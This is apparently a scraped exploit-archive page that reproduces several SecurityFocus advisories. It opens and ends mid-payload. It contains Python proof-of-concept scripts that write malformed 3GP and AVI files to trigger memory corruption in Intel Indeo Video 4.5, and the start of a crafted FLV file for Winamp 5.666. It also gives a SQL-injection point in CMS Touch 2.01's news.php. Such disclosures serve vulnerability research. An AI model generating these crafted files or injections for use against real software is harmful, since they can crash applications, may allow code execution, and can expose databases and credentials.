\x90\x8F\xD5\xC6\x46\x4A\xBA\xD8\x17\xE2\x07\x19\x36\x6C\xF9\x38\x88\x96\x14\x56\x9F\xDB\x97\x00\xE6\xCF\x2B\xA9\xB6

\x5E\x11\x17\x29\x1D\xFB\xD7\x85\xEC\xCC\x38\x43\x66\xC9\xB6\x6B\x4D\x02\x69\xF2\x41\x6F\x28\xF7\xD4\x46\x99

\x9A\xDB\x3E\x16\x40\x57\x9D\x07\x34\x72\x98\x2C\xD6\x9E\x06\x77\x02\xCE\x65\xED\x5C\x27\x5C\xF9\xBA\x4A\xB1\x89\x05

\xFF\xC9\x13\xED\x98\x8B\x76\x21\xA4\x6B\x7E\x53\x29\xA7\x81\xF7\x10\x99\x0D\x01\x7F\x55\x70\x98\xCB\xD1\x6A\x53\x46\xD3

\xF2\x08\x22\xC3\xAF\xB0\x66\x1A\xC5\x4B\xEC\xE9\xCF\xD9\x56\x21\x8B\x1F\x29\x18\x66\x61\x61\x80\xE1\x86\x7F\x0C\xE5

\x1E\xCD\x75\xE9\x59\x64\x38\x46\x9C\xA1\xC4\x0D\xEE\x81\x94\x4C\x1B\xEF\x79\xDC\xBF\xE8\x22\x0C\xD0\x3A\x70\xA0\x80\x89

\xA8\xFC\x16\xFF\xFA\x06\xD8\x2A\xBA\x52\xEE\x5C\x5E\x6A\x02\x16\xCA\x9C\x2A\x70\x52\x56\x28\x54\xCB\x3A\xE6\x49\x52\xE2

\x51\xAF\x12\x90\x8D\x08\x3D\x5B\x4E\x62\x33\x4D\x13\x14\xA5\xDD\xA4\xE8\x4E\x28\x29\x10\x8B\x0E\x0A\x07\x0B\x07\x67\x93

\x30\xE5\xC2\x40\x95\x7D\x6A\x8F\xDF\xCB\xD5\x04\xDB\x6B\x1E\xD6\xC0\x91\x2A\x44\x95\x01\xAE\x99\x29\x60\xF2\x0D\x06\x47

\x39\xC3\xEA\xE6\x72\x1E\x28\x6B\x77\x4E\x4A\x55\xCB\xE6\x27\xB5\x28\x60\x57\xCF\xC5\x8E\x9F\xFF\xBF\x00\x00\x01\xB6\x56

\xC2\x27\xFF\xFB\x01\x5F\xE8\xE8\x02\x37\x06\xF6\x02\x89\xCA\x05\x11\xFF\x00\x43\x82\x22\x46\x65\x36\xEE\x51\xA8\xCF\x84

\x6B\x22\x61\xCB\x03\x13\x0C\x00\xE7\x62\x70\xE4\xF0\xDB\x19\xD4\x2D\xA0\x9C\xFB\x4B\x0E\x9A\xA5\x5D\xF1\x97\xBB\x65

\x3F\x08\xDC\xE5\xF8\x2B\x8C\x3B\x78\x8D\xB8\x17\xF7\x9B\x56\x96\x03\xBC\xE3\x37\xA0\xAE\x3E\xF2\xDE\x34\x80\xF0\x56

\x9A\xD5\x3A\xB1\x02\x7E\x0D\x60\x57\x01\x3C\x0A\x4D\x02\xB9\x00\x68\xA8\x05\x83\x28\x9A\x3C\x54\x06\x6F\xBD\xA9\x7E\xE8

\x40\x6D\x13\x05\xC6\xCE\x04\x12\xE9\xE8\x25\x0F\x2F\x94\xA9\xAD\x08\xBC\x64\x02\x79\xDF\xE3\x4C\x21\x7A\xC8\x0D\x97

\x5A\x07\x15\xAF\xEF\x5A\x34\x27\xF1\x87\xE5\x11\x9E\x08\x4A\x3F\xFF\x89\x7B\x64\x1F\xA8\x51\x91\x30\x50\xBB\x12\x62\x24

\xC0\x51\xD9\xB6\x14\x85\x0D\x04\x39\x5E\x86\xA4\x9E\x1C\xD2\xC8\xF2\x2E\x61\x38\x1E\x05\x20\xC7\xEC\x12\x88\x63\x00

\x8F\x43\x57\xD1\xB2\xFC\xEA\x32\x05\xA6\x46\x4A\x91\x48\xBA\xC2\xA4\x5E\xA3\x59\xC5\x2B\x90\x5A\x66\x8D\x25\x8D\xC1\x98

\x37\x7E\x07\xBE\xD0\x16\xF3\x2D\x29\xFE\xD4\xC4\x50\xB0\x50\x5C\xDF\xBD\x60\x29\x95\x75\x7E\x15\x9E\x05\x37\x67\x2E\x01

\xB1\x71\x75\x54\x07\x2F\x89\xE6\xA8\xF1\x62\x13\x92\x41\x19\x36\x15\x1E\x5C\xF9\x1B\xAB\x51\xFA\x72\x0F\x20\x89

\x9E\x1A\x73\x9B\xA4\x8B\x83\x10\xEC\x6D\x43\x0F\x5D\x05\xBB\xDE\x99\x24\x59\xCC\x30\x33\xED\xD6\x1F\x3E\x44\x68\xC9\xA1

\x3E\x71\x72\x13\x33\x98\x69\x67\xCE\x95\x8D\xB8\xE0\xA4\x87\x86\x2F\x9B\x37\x16\x6C\x2C\x1A\x8E\x94\x8E\x9A\x25\x4C\x28

\x2B\xC7\x80\x32\x83\x0E\x8B\xC7\xAA\x15\xD5\x3C\xE2\x9F\xB7\x63\x02\x37\xB2\xBE\xF3\xC2\x31\xAF\x7E\xA9\xAA\x31

\x1A\xDF\x6C\xE8\x47\x94\x6F\xC3\x99\xAD\x29\xE7\x4D\x23\x3C\x9B\x5E\x2C\x6B\x3C\x8E\x64\xE1\xD4\x87\x19\x7E\x20\xA1\xE1

\xE8\xEA\xFC\x37\xD0\xAA\x31\x1C\x68\x34\x1C\x30\x47\x07\x72\x70\xC4\x20\x9F\x95\x8C\xE9\x43\xA5\xCF\x3C\x88\xD9\x23\x92

\xC6\xE0\xB6\xDB\xF9\x65\x94\x46\x66\x11\x01\xCF\xE5\xFA\x8F\xD9\x59\xCE\x0C\x97\x47\xBA\xA5\x14\x1A\x9F\x58\x0D\x03\x30

\xDF\x16\xDE\x69\x13\x83\x36\xB3\xA7\x21\xDA\x4C\x32\xF7\x60\x1A\x3C\x45\xF9\x99\x81\x64\x65\x87\x70\x46\x44\x7F\x8C\x31

\x0D\x14\xFC\xC8\xC9\x33\x5C\x90\x29\xE1\xD0\x84\x5E\x07\xA4\x56\x3D\xB6\xC5\x6C\x72\x61\x8F\x55\x5E\x57\x65\x57\xE5

\x2A\x1A\x53\xDC\x1A\x84\x7A\xAA\xB6\x2D\x99\x3E\xA1\x05\xBD\xD0\x76\x91\x25\xAA\x7B\x0F\x0A\x94\x61\x33\x51\x86\x82\x97

\x85\x4E\xC2\x83\x57\x8E\x2F\x03\x68\x1D\x03\xA7\x12\x2B\x1A\x31\x4E\x73\x26\xA9\xCE\xC6\x93\x11\x36\x23\xD7

\xBC\xFF\xFD\x01\x40\x40\x06\xF7\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\xF0\xBB\xA4\x3E\x0F\x87\x90

\x82\x6F\xE0\x03\x76\x08\x08\x15\x56\x73\x3E\x2C\xFD\xA0\x23\x9E\x24\xC7\x0A\xA0\x41\x1C\x29\x62\x94\xA6\x0C\x5C\xC3

\x1F\x78\x9F\xC3\x8F\x0F\xC7\x38\x84\x2E\x9F\xF1\xA9\xE6\x0D\x16\xEC\xBF\xF2\xAB\x21\x5C\x7D\xD7\x04\x70\xA9\x7A\x2F\x03

\xFA\xE5\xE1\x0B\x1F\x6F\x3F\x1C\x8E\x32\x04\x2F\x54\x26\x78\x50\x2F\x9D\xDD\x5F\x8D\x0F\x14\xB3\xAC\x63\x45\x86\x88\x48

\xF4\xB6\x84\xDF\x8D\x86\x88\x51\xD5\x3A\x7F\xE9\x14\xD7\x05\xCD\x19\x97\xD1\xA2\xF1\xDD\x31\x1F\x35\x30\xB6\x97\x76

\xEF\x62\x6E\xCE\x99\xD9\x5A\xA3\xC5\x27\xBC\x20\x1D\x01\x1E\xBA\xD8\xBE\xA6\x8D\x92\x13\x90\xDA\x41\x44\x49\x0B\x72\x54

\x00\xBC\x7F\x5E\xF0\xDE\xB5\x40\xC4\x17\x42\x6D\xC6\xC9\x28\x15\x4D\x9C\x04\x05\xF1\x1A\xCD\xF3\x32\x5F\xBC\x0A\x70

\x1A\x48\x2F\x30\x0F\x96\x7D\xA3\x45\xE0\xB5\x67\x49\x6B\x4D\x85\x78\x5E\x01\x97\x03\x11\xBB\xDA\x42\x04\x43\xF0\x35

\x6C\x0C\x37\x81\x1A\x98\xD9\xC3\x9E\xAE\xA6\x6E\xAB\xAB\xD8\xA4\x64\x28\x70\x74\x3E\xB0\x6E\x31\x6D\xF5\x51\xA8\xF5\x36

\xD7\x2B\x97\x74\x0B\x4B\x5A\x75\xD0\x6F\x64\x23\xAB\xC5\x6F\x05\xA4\x74\xF7\xA2\xBC\x08\x75\x47\x58\xF0\x78\x12\x67\xA8

\x2F\x32\xC7\x78\x57\x1D\xFA\x36\xB6\x32\xD4\xFC\xD4\xFA\xC4\x00\x57\x8C\xAB\x09\xF7\xC8\x98\xC0\x12\xCF\xB0\xDD\xA6\x60

\xCA\xD5\x1A\x61\xAD\x41\xF6\xEE\xF8\x22\x60\x60\x12\xBF\x69\x57\x9A\x70\x01\x2D\x1A\x0D\x19\x26\x1E\xB6\xF3\x59\x93\x30

\x2D\xF8\x70\x58\x9F\xF6\x6F\xA5\x3B\x5D\xC4\x1C\x16\x58\xD2\xAA\xBD\x01\x4E\xD5\xA2\x08\xD6\x12\x0C\x52\x6F\x9D\x0C\x55

\xEF\x41\x56\x30\x02\xD2\x05\x00\x50\x3C\xDC\x43\x64\x46\x40\xB7\x91\x47\x34\xA3\x3C\x8A\xDC\xC9\xD6\xA4\x42\x0F\x40\xA3

\x91\x78\x85\x88\x4A\x79\x11\x13\x43\x37\xCC\xE3\x40\x60\xC3\xB3\x6C\xFB\x9D\x26\xEB\x8F\x1A\xAE\xB9\xA4\x00\xE0\x07\xF9

\xDF\x62\x2B\xE7\xC9\x4B\x1D\x77\xD9\x2B\x1B\x47\x89\x6C\x84\xBD\x89\x1C\xE4\x23\x7A\xE7\xB9\xD8\xCA\x6A\x17\x68\x88

\xCF\x0A\x16\x82\x49\x7B\x8E\x83\xD9\x1E\xC5\x54\x44\x9A\x33\x69\x4D\xC7\x6C\xE4\xD2\xC9\xF8\x1B\xFB\x63\x79\xE8

\x9A\xEB\xFE\x73\xE8\xE0\x5A\xF8\x61\xEE\xB4\xE7\x3F\x4E\x0D\xBA\x11\x9F\xBD\xB6\xD7\xF2\xA6\xC9\xF7\xCE\xF8\x6C\x4E\x93

\xBE\x0E\xB0\x51\x49\xC6\x9F\x2C\xDB\x10\xF3\x46\xB8\xFC\x7C\xED\x30\x3F\x01\x50\x15\xA4\x8C\xA5\x3A\x26\x02\x43\x34\xB1

\x80\x5D\xFC\xC5\x3C\x8A\x00\xBC\x0B\x00\x4E\xEE\x2E\xC3\xE6\xB5\xAF\xC7\x49\x53\xFB\xB9\x80\x61\xFA\xF1\xB5\x33\x07

\xBD\xD0\x28\xA9\x0A\x97\x2B\xE3\xD4\x15\x58\x9D\xE3\x31\xD5\xC8\xA4\x7D\xD3\xAE\x29\xB1\xCB\x0E\xEA\x84\x57\xA9\x86\xF2

\xB2\x1F\xC5\xF8\x11\xF4\x53\xE7\x6F\xE1\x36\x73\x12\xDB\x6B\x3A\xF7\xE4\xF8\x59\x74\x84\x12\x93\x5A\x9D\x3A\x16\xCF\xB9

\xC3\x33\x4C\x7E\x54\x10\x77\x2D\x41\x11\x48\x0F\xA0\x77\xF1\xE8\x56\x09\x93\xDA\x13\x67\x4F\x5A\xA4\x67\x6B\x8B\xEA\x86

\x2C\x44\x10\x53\x12\xD1\x61\x55\x7B\x68\x02\x78\x26\x11\x67\x9F\xF5\x77\x55\xB5\xA7\x4E\xC3\x36\xBE\xC5\x4E\x7D\xE9\xD5

\xCB\x48\x07\x01\x52\x15\x9D\x14\x66\x11\xA9\x08\xC2\x35\xAA\x50\x03\x00\x06\xEC\x05\xB1\x60\x23\x5B\x5B\x3D\x67\x75

\xED\x1E\x8E\xF4\x3D\x70\x22\x43\xA9\x72\xB0\x1C\x8C\x1C\x42\x79\x22\x8E\xD3\xB8\x05\x1A\xA1\x1D\x0E\x9F\x31\x6D\x2D\x59

\xF9\x4D\x04\xEE\xDD\xD5\x7A\xB8\x7D\xEC\xA6\x65\x7C\xEB\x40\x53\xF9\xF3\xD7\xBD\xAF\xF5\xBF\x27\xB5\xDC\x53\xB6\x3D\x68

\x53\xCE\xE3\xD9\x4E\x14\x29\x29\x24\x1C\x20\x4A\xE0\xDC\x33\x25\xC9\xB2\x75\x22\xE2\xEC\x76\x0E\x38\x96\x6B\xE8\x89\xC0

\x50\x9D\x03\x5A\x00\x5E\x71\xCF\x61\x74\xC5\x55\x01\x4A\xC7\x30\x5D\xAD\xEA\x60\x0E\xAD\xC7\x3B\xC6\xED\xCE\x40\x0E\x01

\x4E\x15\x99\x56\x15\x31\x25\x4E\x2A\x66\x52\xD2\xCF\x7C\x0E\x80\xC0\x4A\x03\x52\x94\x02\x9D\x98\xE6\x45\xA8\x02

\x9C\xBA\x7C\xFA\x25\xB2\x00\x59\x1D\x59\x76\x47\xD9\x6A\xDC\x26\xE8\xB7\x68\x76\x44\x8C\x3D\xFB\xC7\x42\x07\xE8\x63"
outfile = file("poc.3gp", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
HireHackking 
source: https://www.securityfocus.com/bid/67431/info

Intel Indeo Video is prone to a memory-corruption vulnerability.

Attackers can exploit this issue to crash the affected application, resulting in a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.

Intel Indeo Video 4.5 ir41_32.ax version 4.51.16.3 is vulnerable; other versions may also be affected. 

header1 =
"\x52\x49\x46\x46\xE8\x69\x04\x00\x41\x56\x49\x20\x4C\x49\x53\x54\xC0\x00\x00\x00\x68\x64\x72\x6C\x61\x76\x69\x68\x38\x00\x00\x00\x9B\x6F\x00\x00\x5E\x74\x01\x00\x00\x00\x00\x00\x10\x08\x00\x00\x6E\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x0C\x00\x00\x00\x01\x00\x00\xF0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x74\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73\x63\x76\x69\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x23\x00\x00\x00\x00\x00\x00\x00\x6E\x00\x00\x00\x02\x0C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xF0\x00\x73\x74\x72\x66\x1F\x00\x00\x00\x28\x00\x00\x00\x00\x01\x00\x00\xF0\x00\x00\x00\x01\x00\x18\x00\x49\x56\x34\x31\x00\x1C\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4A\x55\x4E\x4B\x18\x07\x00\x00\x00\x00\x00\x00"

pattern1 = "A" * 1808

header2 =
"\x00\x00\x00\x00\x4C\x49\x53\x54\x08\x5B\x04\x00\x6D\x6F\x76\x69\x30\x30\x64\x62\x72\x07\x00\x00\xF8\xFF\x83\x70\x07\x00\x0E\x0F\x00\x10\x80\x0F\x00\x00\x86\x59\x0C\xE9\x7D\x00\x80\x17\x00\x0D\xE9\x05\x86\x40\x8B\x6C\xC0\xE0\x10\xC2\x53\xF2\xD2\x10\x61\x31\x73\x81\x03\xFE\x77\x1A\x00\x00\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9A\xE7\x79\x9E\xE7\x78\x9E\xE7\x79\x9C\xE7\x38\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE3\x79\x9E\xC7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x78\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x78\x9E\xE7\x69\x9E\xE7\x79\x9A\xE7\x69\x9A\xA7\x69\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x1E\xE7\x39\x1A\x63\x39\x1E\xE7\x79\x8E\xA7\x58\x9E\x22\x20\x9E\xE7\x79\x9A\xE7\x79\x8E\xA3\x39\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x0E\xE7\x79\x9E\xE7\x79\x9E\xE7\xF9\xF0\x1C\xCF\x72\x30\xC7\xF2\x3C\xCF\xF3\x3C\xC7\x03\x1C\x0F\x72\x18\xC0\xF3\x3C\xCF\x52\x3C\xCF\x93\x04\x4F\x23\x3C\x4E\x03\x4F\xB8\xEB\xE2\xEC\x98\x90\xED\x80\x97\xC5\xF5\x31\xB7\xCD\xDE\x71\x7C\xC0\x87\x26\x8A\x57\x13\xEF\xF1\x03\x91\x92\x53\x50\xB2\x84\x06\xFB\x11\x77\x6C\x72\xAB\x64\xF0\x9E\x57\xDD\x64\x31\x4F\x5C\xC9\x76\x44\xCA\x16\x0C\x47\xBC\xA8\x89\x65\x62\x70\xE2\xEA\x80\x17\x4E\x5C\x91\x47\xF1\xA1\x18\x94\x38\x62\x9C\xB8\x3A\x60\x97\x25\xE4\xBC\x89\x89\x60\x61\x60\x2D\x64\xD3\x3A\xC6\x22\x8A\x85\x3D\x48\x93\xB3\x20\x45\x6E\x63\xC0\xE6\x86\xE0\x93\xC4\xC8\xD9\x51\xF0\xA2\x78\x13\xC1\xA6\xBC\x22\xBA\x59\x90\x2B\xF6\x22\xEA\xC9\x23\xE1\xA5\x43\xB1\x75\x1F\xF0\x22\x12\xD3\xE2\xBD\x9D\xC4\x31\xD1\xCC\xEC\x04\x23\x43\xDF\xB3\x79\xCC\x0D\xE7\xB2\x71\xC5\x3A\x32\x07\xB2\x0E\x13\xC1\x19\xC1\x75\xC4\x78\xC0\x10\xEC\xD5\xC5\xC2\xD6\x2C\xC5\x56\xC5\x6D\xB3\x17\x6F\x46\xF2\x03\x71\xD6\xAC\x8D\xDC\x86\xDC\x10\xAC\xD5\x2C\x47\x24\x71\x4C\x70\xC5\xCC\xCE\xC0\x47\x3B\x95\x9B\xE2\xFA\x88\xA7\x44\xB1\x3F\xE2\xE9\x31\x6B\x05\x4B\x15\x83\x9C\xF1\xB0\x39\x0B\x52\xD9\x8F\x9A\xA5\x0D\x0A\xD9\x26\xF6\x9A\x70\x0D\x0A\x52\x3E\xC4\x81\x9C\xB3\xB0\xBD\x63\xE6\x8A\x5B\xD6\xC0\xE3\x63\x9E\x2E\x51\x72\x5B\x74\xCA\x56\x0C\x5C\x2B\x4B\xC9\xD5\x31\x1E\x10\x21\x73\x11\xC7\xAC\x39\x18\xE4\xC4\x4D\x61\x37\x51\x64\x61\x71\x75\xC0\xDC\x24\xC1\xCE\x80\x3C\x95\x95\xE2\x8C\xB7\xDC\x76\x31\x74\x33\x14\xB7\xDC\x18\xBC\xE4\x55\xC9\x8D\xF7\x78\xCC\xC6\x3A\x31\x7F\x10\xCE\x82\x34\x78\x75\xC0\xC2\x7B\x82\xC7\xCD\x73\xD9\x8A\x96\x39\x82\x9B\xE6\x9C\x10\xAB\x19\x8A\x6B\x79\x4F\x16\xE7\x35\xF1\xF4\x9E\x54\xA2\x58\xD9\x8A\xBD\xD8\x9A\xEB\xE6\x6C\x62\x1D\x39\x43\x6E\x8F\x39\x33\x09\xD4\x66\x61\xF7\x35\x37\x24\x51\xC4\x18\x5C\x07\x37\xB2\x94\xAC\x5C\x33\x44\x10\x13\xBF\xF1\xFC\x2A\xE6\x91\x6F\x7B\xC8\x4B\xAE\x39\xAB\xE6\x8E\x6B\x0C\x83\xBD\x82\xB3\x63\x92\xA8\xE0\x6D\x85\x3C\x2F\x0E\x82\xCB\x0E\x86\xD3\x7B\x9E\xF2\x9E\xC7\x13\x37\xD1\xEC\xC5\x36\x71\x6D\xF3\xA1\x1B\x3D\x60\xE3\x95\xD1\x6C\xC5\xDD\x01\xD9\xCD\x39\x3B\x6F\xA4\x83\x94\xFC\x40\xDC\x70\x7B\xC0\x7E\xC0\xE2\xC4\x53\x66\x86\x60\x90\x59\x79\xC3\x75\x29\x67\xBC\x65\x93\x3D\xB8\x2A\x31\x08\xB9\x0E\x39\x63\x60\x8F\xA0\x27\x26\x79\xC2\x58\x2F\x87\x18\x96\x89\x27\x9C\xD5\x11\x4F\xF8\xD0\xF9\x32\x3F\x36\x4F\x78\x91\x51\x4A\x66\x34\x77\xB1\x1A\x2C\xAE\xCA\x35\xD9\x3C\x7D\x44\x3C\x62\x2D\x6E\x27\xDE\x1F\x71\x53\xBC\x2A\x42\x79\x7A\xC4\x52\x7C\xA4\xE2\xA5\xDC\x15\x23\xAF\x8E\xC9\x91\x0F\x51\x8C\x3C\x66\x9E\xF8\x18\x45\x14\x1F\x5C\xE6\x90\x8F\x51\x8C\x3C\x66\x0B\x9B\x37\x45\x14\x8F\xAB\xB8\x29\x9E\x16\x51\x3C\x2C\x86\xE2\x8E\xE0\x96\xB9\x78\x49\xD6\x93\x47\xC2\x75\x24\x59\xBC\x27\x8B\x57\x15\xCC\xCA\xF3\x7A\xF2\x48\x08\x5E\x1D\x31\x14\x77\xBC\x28\xBE\xF7\xCD\x6D\x2C\xD1\xF2\x4B\xBC\x38\xE2\x86\xE0\xB2\xA9\x81\x8F\x80\x7C\xCC\x58\xD8\x8C\x91\x8F\x40\xF0\x09\x9B\x25\x06\x3E\x32\x1F\x37\x07\x3C\xE5\x53\x92\x3C\x6E\x66\x07\x3E\x01\xC9\xC7\x8C\x81\xA5\x47\x3E\x02\x1B\x9F\xF6\x94\x37\x11\xBC\x67\xE1\x71\x46\xB3\x36\x1F\x83\x17\x87\x5C\xF7\xC4\xC7\x40\x1E\x46\x90\xC9\x4B\x06\x3E\x78\x73\xC7\x15\xAF\x0C\x9A\x97\x5C\xCB\x79\xF3\x21\x98\x59\x39\x97\x97\xBC\x1A\x82\x2B\x36\xDE\xF6\xC4\x55\xF0\xC5\x22\x46\x79\xB8\x46\xF4\x07\x09\x3E\xF5\xD1\xC8\xE2\xCC\xE7\x8B\xE6\xCD\x6C\x68\xF0\xF1\x1F\xF1\xA6\xF8\x54\x27\x9C\x1E\xF3\x51\x8F\x38\x8B\xE4\xD3\xCD\x3F\xC5\xCC\x67\x35\xF1\x88\x8F\x59\xA3\xAC\xB3\xD3\x07\xE1\x33\x1E\x11\x47\x7C\x8A\x41\x6E\x0E\xF9\x58\x47\x64\xF1\xE9\x6A\xF2\x83\x72\x11\x3C\x2F\xCE\x8A\x4F\x31\xF7\x27\x0F\xE6\xE1\x80\x4F\x53\xE4\x11\xB7\x35\xF2\xF0\x13\xF3\xF1\x8B\xBD\xB8\x1D\x98\xE7\x03\x2E\x42\x54\x3E\x5A\x1C\x72\xC1\x56\x6C\xC5\x65\x1E\x73\xB6\x1C\xF0\xB4\x88\x90\xEB\xE4\xFA\x84\x0F\xA1\xAC\xC5\xC0\x07\x98\xF9\x08\xAC\xCA\x8B\x85\x97\x87\x0C\xC5\xC6\x47\x3B\xE1\xFD\xC0\x50\x6C\x85\xC5\x82\x0C\xC8\x80\xC8\x80\x04\x41\x12\x04\x81\xC8\xC2\xCA\xC2\x40\x22\x1B\x33\x72\x46\x32\x73\x45\xB2\x32\x30\x20\x49\x10\x04\x33\xB2\x20\xC9\x86\xC8\xC0\x5A\x0C\x0C\xBC\x20\x90\x0D\x19\x90\x60\x40\x24\x18\x08\x64\xC0\x62\x61\x60\x8D\x51\x82\x85\xAF\xEF\x30\x84\x7C\x81\x39\xC6\x89\x97\xAC\xCF\x92\xA1\x65\x23\xF8\x66\x5E\xC5\x30\x84\x1E\x46\xF8\x61\x3E\x10\x9F\x6B\x8D\x88\x63\x2E\x48\x6E\x98\x99\x49\x36\x82\x1D\xB9\x62\x27\xD8\x58\xD9\x48\x92\x60\xE1\xA3\xB5\x6C\x2D\x5F\xCA\x3A\xE6\x2E\xA2\xF9\x02\x24\x9F\xE3\x19\x37\xCD\xC7\x3A\x15\x4F\xE5\x8B\xC6\x14\xDC\xF0\x69\x4E\x25\x4E\x7D\xF2\x50\xF8\x14\x07\x87\x5C\xE5\xC4\x27\x6B\x26\x3E\x26\xD7\x27\x7C\xF6\x66\x6E\x3E\x61\x73\x96\x4E\x7C\x76\x1E\xC6\x01\x57\xBC\x8D\x2E\x3E\xA6\xF5\xE4\xA1\x70\x31\xFC\x1E\x1F\x7C\x7E\x76\x92\xCA\x47\x5D\x3E\x2C\xDF\x3B\x8E\x79\x93\x4E\xCA\xFE\x81\x4E\xF8\xA8\xAB\x1F\x9B\xF7\x73\x1E\xBF\x8B\x27\xA7\xC2\x67\x9C\xF9\x00\xBE\xE3\x63\x24\x37\x5C\x07\x03\xE7\xC3\x01\xFB\xE9\x3D\x57\xCD\xA7\x30\x78\xDA\xDC\x9D\x12\xA7\xCC\x56\xF0\xF0\x11\x1F\xE2\x14\x0D\x66\x49\x9E\x36\x73\x73\xCE\x5C\x3C\x3D\x25\x3B\xB8\x2E\x46\x3E\x6E\xB1\x73\xD6\x9C\x37\x4F\x79\x11\x15\x6C\x13\x0F\xB9\xB3\x92\x0F\x3D\x72\xE9\xCC\xD3\x52\x6E\x79\x5F\xD8\x1A\x2C\x11\x13\x59\xF8\x88\xAD\x8B\xAD\xB9\x0C\x43\xDE\xE7\x10\x1F\x94\x41\x16\xE5\x23\x13\x4E\x64\xB1\xF3\x22\xD4\x27\x0F\x84\xAB\xE1\x2B\x71\x36\x10\x1F\x8F\x6F\x51\x93\x7C\xEA\xD5\xE3\x78\xC7\x65\x55\xF0\x29\x57\x4B\x56\xAB\x0E\xF8\x0C\xC9\x27\xD4\xA1\xF8\xF8\x92\x38\xD8\x72\x46\xF3\x71\xCD\xE2\xEA\x48\xEE\x8A\x2C\xD6\x62\xE0\x86\x9D\x8D\x85\xDB\x62\x2B\xCE\x08\xF6\x62\xE6\x8E\xE0\x2B\x87\xC5\xA6\xDC\x71\xCE\x4D\x31\x72\xC8\x8B\x67\x4F\x1E\x09\x2F\x59\x63\x62\x95\x65\xE2\xFC\x88\xB3\xE2\xCC\xE4\x86\x95\x91\xF7\xC5\x56\xBC\x3A\x62\x53\xDE\x90\x0C\xDC\xBE\xE6\x8E\x9D\x2F\xBB\xDD\x2C\xFB\xF1\x3A\x84\x1F\x2A\xB3\x79\xB1\x5E\x9C\x2F\x9F\xCD\x77\xA9\x4F\xB6\x84\xEF\x86\x47\xF2\xA2\x32\xB8\x33\x8B\x1B\x02\x8B\x85\x20\x10\x59\xD8\x19\x08\x44\x06\x02\x91\x20\x90\x40\xBE\x79\x1C\x30\x38\x12\x23\xDB\x47\x24\x1D\xB1\x58\x8A\x4D\x9E\x4B\x14\xC5\x99\x32\xB2\x29\x1B\x0B\x16\x03\x03\x12\x24\x0B\x33\x2B\x12\x2C\x6C\xCC\x2C\x2C\x04\x12\x0C\x24\x81\x04\x12\x48\x10\x24\x03\xF2\x1D\x8E\x78\xCA\xC3\x68\x6E\x26\x16\x4A\x5E\x75\xF0\x34\x3B\xF8\x34\x72\xC5\x2E\x1B\x1B\x03\x03\x22\x0B\xE7\x5C\x71\xCE\xCA\xC0\xCC\xC2\x19\x41\x32\x30\x90\x6C\x04\x03\xC9\x80\x48\x20\x03\x12\x24\x03\x0D\x0A"

pattern2= "A" * 1035

data = header1+pattern1+header2+pattern2

outfile = file("poc.avi", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
HireHackking 
source: https://www.securityfocus.com/bid/67377/info
 
CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
 
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
CMS Touch 2.01 is vulnerable; other versions may also be affected. 

http://www.example.com/cmstouch/news.php?do=show&News_ID=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/67429/info

Winamp is prone to a memory-corruption vulnerability.

An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition.

Winamp 5.666 is vulnerable; other versions may also be affected. 

data
="\x46\x4C\x56\x01\x05\x00\x00\x00\x09\x00\x00\x00\x00\x12\x00\x02\xA9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08\x00\x00\x00\x1C\x00\x0C\x68\x61\x73\x4B\x65\x79\x66\x72\x61\x6D\x65\x73\x01\x01\x00\x09\x63\x75\x65\x50\x6F\x69\x6E\x74\x73\x0A\x00\x00\x00\x00\x00\x0D\x61\x75\x64\x69\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\x60\xAE\xC3\xE3\x6A\x59\xF5\x00\x08\x68\x61\x73\x56\x69\x64\x65\x6F\x01\x01\x00\x06\x73\x74\x65\x72\x65\x6F\x01\x01\x00\x0C\x63\x61\x6E\x53\x65\x65\x6B\x54\x6F\x45\x6E\x64\x01\x00\x00\x09\x66\x72\x61\x6D\x65\x72\x61\x74\x65\x00\x40\x2C\x00\x00\x00\x00\x00\x00\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x72\x61\x74\x65\x00\x